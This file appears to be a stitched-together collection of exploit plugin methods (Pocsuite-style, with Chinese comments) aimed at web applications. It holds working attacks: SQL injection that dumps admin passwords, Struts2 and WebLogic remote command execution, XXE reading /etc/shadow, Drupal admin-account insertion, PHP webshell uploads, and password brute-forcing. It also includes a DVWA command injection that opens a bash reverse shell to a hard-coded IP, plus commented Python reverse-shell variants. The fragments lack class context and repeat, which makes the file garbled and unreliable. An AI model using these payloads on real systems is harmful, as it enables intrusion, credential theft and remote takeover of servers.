def _attack(self):
result = {}
url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append(
"&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
)
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200:
match_result = re.findall(r'~\w*', res.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
def _verify(self):
result = {}
# 定义地址
vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
# 提升管理员权限Payload
payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="
headers = {"Content-Type": "application/x-www-form-urlencoded"}
email = raw_input("Email: ")
password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
if find_result != -1:
# 获取cookie
cookies = admin_result.cookies
# 发送post请求
get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)
print cookies
print get_shell_result.content
print get_shell_result.cookies
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Postdata'] = payload
return self.parse_attack(result)
def _verify(self):
result = {}
command = "echo 89aifh76ftq4fu38yfq498yf"
payload = "Content-Type:%{(#_='multipart/form-data')."
payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % command
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
response = req.post(self.url, headers=headers)
if "89aifh76ftq4fu38yfq498yf" in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = response.url
return self.parse_output(result)
def _verify(self):
result = {}
#下面以尝试读取/etc/shadow为例子进行测试
filename = '/etc/shadow'
payload=r'<?xml version="1.0" encoding="ISO-8859-1"?>'\
'<?xml version="1.0" encoding="ISO-8859-1"?>'\
'<!DOCTYPE foo ['\
'<!ELEMENT foo ANY >'\
'<!ENTITY xxe SYSTEM "file://{file}" >]>' \
'<Request>'\
'<Username>root</Username>'\
'<Password>root</Password>'\
'</Request>'.format(file=filename)
expurl = '{url}/api/login'.format(url=self.url)
try:
response = req.post(expurl,
data=payload,
headers=self.headers,
timeout=50)
if re.match('root:.+?:0:0:.+?:.+?:.+?',
response.content) and response.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = expurl
result['Fileinfo']['Filename'] = filename
result['Fileinfo']['Content'] = response.content
else:
result = {}
except:
result = {}
return self.parse_output(result)
def _attack(self):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
uid = int(random.random() * 1000)
username = ''.join(random.sample(string.letters + string.digits, 5))
payload = OrderedDict()
if not self._verify(verify=False):
return self.parse_attack(result)
payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
'\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
= 'test'
payload['name[0]'] = 'test2'
payload['pass'] = '******'
payload['form_id'] = 'user_login_block'
# print urllib.urlencode(payload)
response = req.post(vul_url, data=payload)
if response.status_code == 200:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = username
result['AdminInfo']['Password'] = '******'
return self.parse_attack(result)
def _attack(self):
if self.check_argv():
result = {}
self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
# 上传shell
post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
resp = req.post(url=post_url,data=post_data)
# 从返回的内容中提取上传图片的文件名
if resp.status_code == 200:
match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
if match_result:
# 访问本地文件包含地址
payload = "../../uploadfiles/" + match_result.group(1) + "%00"
vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
resp = req.get(vul_url)
if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = vul_url
result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
return self.parse_attack(result)
return self._verify()
def _attack(self):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
uid = int(random.random() * 1000)
username = ''.join(random.sample(string.letters + string.digits, 5))
payload = OrderedDict()
if not self._verify(verify=False):
return self.parse_attack(result)
payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
'\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
= 'test'
payload['name[0]'] = 'test2'
payload['pass'] = '******'
payload['form_id'] = 'user_login_block'
#print urllib.urlencode(payload)
response = req.post(vul_url, data=payload)
if response.status_code == 200:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = username
result['AdminInfo']['Password'] = '******'
return self.parse_attack(result)
def common(self):
payload = 'formid=1&login=ALARM'
response = req.post(self.url + "/escform.esp" , data = payload).content
sessionid = re.search('<FRAME src="escmenu\.esp\?sessionid=(\d*)' , response)
if sessionid:
sessionid = sessionid.group(1)
return sessionid
def _verify(self):
result = {}
username = '******' # 登陆账号
pwdlist = getLargeWeakPassword()
for pwd in pwdlist:
htmlTXT = req.get(self.url + "/login.php")
Content = pq(htmlTXT.text)
tokenStr = Content("input")
Token = tokenStr[3].value # 获取Token
_cookies = htmlTXT.cookies.get_dict() # 获取Cookies
payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'}
response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
rcontent = pq(response.text)
reqMes = rcontent('.message').text()
if reqMes == "Login failed":
continue # 失败跳出本次循环
if reqMes == "CSRF token is incorrect":
result['extra'] = {}
result['extra']['error'] = 'user_token校验失败'
return self.parse_output(result) # CSRF 失败
# 成功
result['DBInfo'] = {}
result['DBInfo']['Username'] = username
result['DBInfo']['Password'] = pwd
return self.parse_output(result)
def _verify(self):
"""verify mode"""
result = {}
filename = "/_async/AsyncResponseService"
self.url = self.url.strip('/') + filename
headers = {'content-type': 'text/xml'}
# flag = ''.join(random.choices(string.ascii_letters) for _ in xrange(0, 8))
# flag = flag.lower()
cmd = 'echo d2hvYW1p|base64 -d|bash'
data_linux = self.payload_linux.format(cmd)
data_win = self.payload_win.format(cmd)
r1 = req.post(self.url, data=data_linux, headers=headers, timeout=7)
r2 = req.post(self.url, data=data_win, headers=headers, timeout=7)
if r1.status_code == 202 or r2.status_code == 202:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
return self.parse_output(result)
def _verify( self ):
result = {}
username = '******' # 登陆账号
password = '******' # 登陆密码
htmlTXT = req.get(self.url + "/login.php")
Content = pq(htmlTXT.text)
tokenStr = Content("input")
Token = tokenStr[3].value # 获取Token
_cookies = htmlTXT.cookies.get_dict() # 获取Cookies
# 改写模式为简单
_cookies['security'] = 'low'
payload = {'username': username, 'password': password, 'user_token': Token, 'Login': '******'}
response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
# 生成随机md5字符做为验证
rand_num = random.randint(0, 1000)
md5 = hashlib.md5()
md5.update(str(rand_num))
m = md5.hexdigest()
# 验证命令注入是否存在
payload = {'ip': '127.0.0.1;echo "<p>' + str(m) + '</p><br/>"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
htmlText = pq(response.text)
tag = htmlText('pre p').html()
if tag == str(m):
# 反射shell 提前开启nc
# 方法一 bash Shell
payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法二 new bash Code
# payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法三 Python Shell 貌似这方法只适合手动跑
# payload = {
# 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
# 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
result['extra'] = {}
result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
return self.parse_output(result)
def _verify(self):
"""verify mode"""
result = {}
resp = req.post(self.url)
time.sleep(2)
if 'information_schema' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _verify(self):
'''verify mode'''
result = {}
self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
resp = req.post(self.url,headers = self.headers)
if resp and resp.text and resp.status_code == 200:
if "bey0nd" in resp.text:
result['FileInfo'] = {}
result['FileInfo']['Filename'] = "bey0nd"
return self.parse_output(result)
def _verify(self):
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _attack(self):
result = {}
vul_url = '/admin/file_manager.php'
params = {'action': 'save'}
webshell = PhpShell()
webshell.set_pwd(genPassword(6))
filename = ''.join(
[random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
content = webshell.get_content()
data = {'filename': filename, 'file_contents': content, 'submit': ''}
req.post(self.url + vul_url, params=params, data=data)
if webshell.check(self.url + ('/%s' % filename)):
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + ('/%s' % filename)
result['ShellInfo']['Content'] = content
return self.parse_output(result)
def _attack(self):
head = {
'Connection-Type': 'application/x-www-form-urlencoded',
'Content-Type': 'application/x-www-form-urlencoded'
}
payload = 'action=get&resource=%3Bid'
response = req.post(self.url + '/res.php', data=payload, headers=head)
if response.content:
return self.parse_attack(response.content)
else:
return self.parse_attack(False)
def _verify(self):
result = {}
testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')
payload = {
'myfile':
('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>',
'image/jpeg')
}
data = {'submitBtn': 'Upload'}
req.post(vulurl, files=payload, data=data).content
resp = req.get(testurl)
if '5a8adb32edd60e0cfb459cfb38093755' in resp:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
#Write your code here
return self.parse_output(result)
def _attack(self):
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200:
match_result = re.findall(r'~\w*', res.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
def _attack(self):
"""attack mode"""
result = {}
filename = "/_async/AsyncResponseService"
url = self.url.strip('/') + filename
print(url)
headers = {'content-type': 'text/xml'}
#--ping `whoami`.weblogic.xxxxxx.ceye.io--
cmd_linux = 'echo cGluZyBgd2hvYW1pYC53ZWJsb2dpYy42ZmJwaWMuY2V5ZS5pbw==|base64 -d|bash'
cmd_win = 'echo cGluZyBMTEwud2VibG9naWMuNmZicGljLmNleWUuaW8=|base64 -d|bash'
data_liunx = self.payload_linux.format(cmd_linux)
#print(data_liunx)
data_win = self.payload_win.format(cmd_win)
r1 = req.post(url, data=data_liunx, headers=headers, timeout=7)
r2 = req.post(url, data=data_win, headers=headers, timeout=7)
if r1.status_code == 202 or r2.status_code == 202:
whoami = self.verify_result()
if whoami:
result['extra'] = {}
result['extra']['whoami'] = whoami
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
return self.parse_output(result)
def _verify(self):
result = {}
url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append(
"&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
)
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _verify(self):
result = {}
vul_url = '/admin/file_manager.php'
params = {'action': 'save'}
webshell = PhpVerify()
filename = ''.join(
[random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
content = webshell.get_content()
data = {'filename': filename, 'file_contents': content, 'submit': ''}
response = req.post(self.url + vul_url, params=params, data=data)
if webshell.check(self.url + ('/%s' % filename)):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = response.url
return self.parse_output(result)
def _attack(self):
'''
在根目录下生成一个shell,1.php
<?php eval($_POST["a"]);?>
'''
result = {}
payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A55%3A%22file_put_contents%28%271.php%27%2C%27%3C%3Fphp+eval%28%24_POST%5B%22a%22%5D%29%3B%3F%3E%27%29%22%3B%7D"
vulurl = urlparse.urljoin(
self.url, "/ajax/api/hook/decodeArguments?arguments=%s" % payload)
resp = req.get(vulurl)
if resp.status_code == 200:
verify_payload = {"a": "echo md5(0x2333);"}
shell_url = urlparse.urljoin(self.url, '/1.php')
resp1 = req.post(shell_url, data=verify_payload)
if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
result['shellURL'] = shell_url + " password: a"
return self.parse_attack(result)
return self.parse_attack(result)
def _verify(self):
result = {}
target = self.url + '/celive/live/header.php'
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# 使用 requests 发送 post 请求
response = req.post(target, data=post_data, timeout=10)
content = response.content
# 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
if 'e165421110ba03099a1c0393373c5b43' in content:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = target
return self.parse_result(result)
def _verify(self, verify=True):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
payload = {
'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
'135)),floor(rand(0)*2))x from information_schema.tables group by x' \
')a);;#]': 'test',
'name[0]': 'test2',
'pass': '******',
'form_id': 'user_login_block',
}
response = req.post(vul_url, data=payload).content
if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = urllib.urlencode(payload)
return self.parse_attack(result)
def _verify(self, verify=True):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
payload = {
'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
'135)),floor(rand(0)*2))x from information_schema.tables group by x' \
')a);;#]': 'test',
'name[0]': 'test2',
'pass': '******',
'form_id': 'user_login_block',
}
response = req.post(vul_url, data=payload).content
if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = urllib.urlencode(payload)
return self.parse_attack(result)
def _verify(self):
"""verify mode"""
result = {}
filename = "/_async/AsyncResponseService"
url = self.url.strip('/') + filename
print(url)
headers = {'content-type': 'text/xml'}
flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
flag = flag.lower()
data = self.payload1.format(flag, flag, flag)
print(data)
r = req.post(url, data=data, headers=headers, timeout=7)
if r.status_code == 202:
flag_url = self.url.strip('/') + '/bea_wls_internal/{0}.jsp?pwd=s{1}'.format(flag, flag)
print(flag_url)
r2 = req.get(flag_url)
if flag in r2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url.strip('/') + filename
return self.parse_output(result)
def _verify(self):
result = {}
target = self.url + '/celive/live/header.php'
post_data = {
'xajax':
'LiveMessage',
'xajaxargs[0][name]':
"1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# 使用 requests 发送 post 请求
response = req.post(target, data=post_data, timeout=10)
content = response.content
# 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
if 'e165421110ba03099a1c0393373c5b43' in content:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = target
return self.parse_result(result)
def _attack(self):
result = {}
vulurl = self.url
# TODO;
if not self.params["var1"]: self.params["var1"] = "a"
if not self.params["var2"]: self.params["var1"] = "b"
payload = self.params["var1"] + "[0]=1&" + self.params["var2"] + "[0]=2"
print payload
resp = req.get(vulurl, params=payload)
match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
if match_result:
result['FlagInfo'] = {}
result['FlagInfo']['GetFlag'] = self.params[
'name'] + "{" + match_result.group(1) + "}"
resp = req.post(vulurl, params=payload)
match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
if match_result:
result['FlagInfo'] = {}
result['FlagInfo']['PostFlag'] = self.params[
'name'] + "{" + match_result.group(1) + "}"
return self.parse_attack(result)
def _verify(self):
"""verify mode"""
result = {}
header = {
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
}
payload = '/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input'
flag = "".join(
random.choice(string.ascii_letters) for _ in xrange(0, 8))
data = '<?php echo "' + flag + '"; ?>'
self.url = self.url.strip('/') + payload
resp = req.post(self.url, headers=header, data=data)
time.sleep(2)
if flag in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _attack(self):
"""attack mode"""
result = {}
filename = "/_async/AsyncResponseService"
url = self.url.strip('/') + filename
cmd = 'whoami'
headers = {'content-type': 'text/xml'}
#--ping `whoami`.weblogic.xxxxxx.ceye.io--
flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
flag = flag.lower()
data = self.payload2.format(flag)
r1 = req.post(url, data=data, headers=headers, timeout=7)
if r1.status_code == 202:
datalist = self.verify_result(flag, cmd)
if datalist:
result['extra'] = {}
result['extra']['whoami'] = datalist[0]
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url.strip('/') + filename
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = datalist[1]
result['ShellInfo']['Content'] = data
return self.parse_output(result)
def _verify(self):
result = {}
flag_list = [
'src="navigation.php', 'frameborder="0" id="frame_content"',
'id="li_server_type">', 'class="disableAjax" title='
]
user_list = ['root', 'admin']
password_list = [
'root', '123456', '12345678', 'password', 'passwd', '123', 'admin',
'admin123'
]
try:
response = req.get(self.url)
if 'name=\"phpMyAdmin\"' in response.content:
target_url = str(self.url) + "/index.php"
else:
response = req.get(self.url + '/phpmyadmin/index.php')
if 'input_password' in response.content and 'name="token"' in response.content:
target_url = self.url + "/phpmyadmin/index.php"
except Exception as e:
pass
for user in user_list:
for password in password_list:
payload_data = "pma_username="******"&pma_password="******"" \
"&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci"
try:
respond = req.post(target_url, data=payload_data)
for flag in flag_list:
if flag in respond.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['Payload'] = payload_data
except Exception as e:
# print(e)
pass
return self.parse_output(result)
def _attack(self):
result = {}
#need Cookie and username and uid
if not 'Cookie' in self.headers:
raise Exception('Cookie required')
if not 'username' in self.params:
raise Exception('uid required')
img_url = self.upload_image()
payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23'
sess = req.Session()
sess.headers.update(self.headers)
sess.get(img_url.replace('300x300', payload))
#get shell
resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content
if 'cfsqingfd' in resp:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url
result['ShellInfo']['Content'] = 'e'
return self.parse_attack(result)
def _verify(self):
if self.check_argv():
result = {}
# 设置header里的Content-Type,表明需要上传文件
self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
# 文件名为testjpg.jpg,内容为<?php echo md5(0x2333333);unlink(__FILE__); ?>
post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
# 上传地址,这个是正常功能
post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
resp = req.post(url=post_url,data=post_data)
# 从返回的内容中提取上传图片的文件名
if resp.status_code == 200:
match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
if match_result:
# 访问本地文件包含地址
payload = "../../uploadfiles/" + match_result.group(1) + "%00"
vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
resp = req.get(vul_url)
if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return self.parse_attack(result)
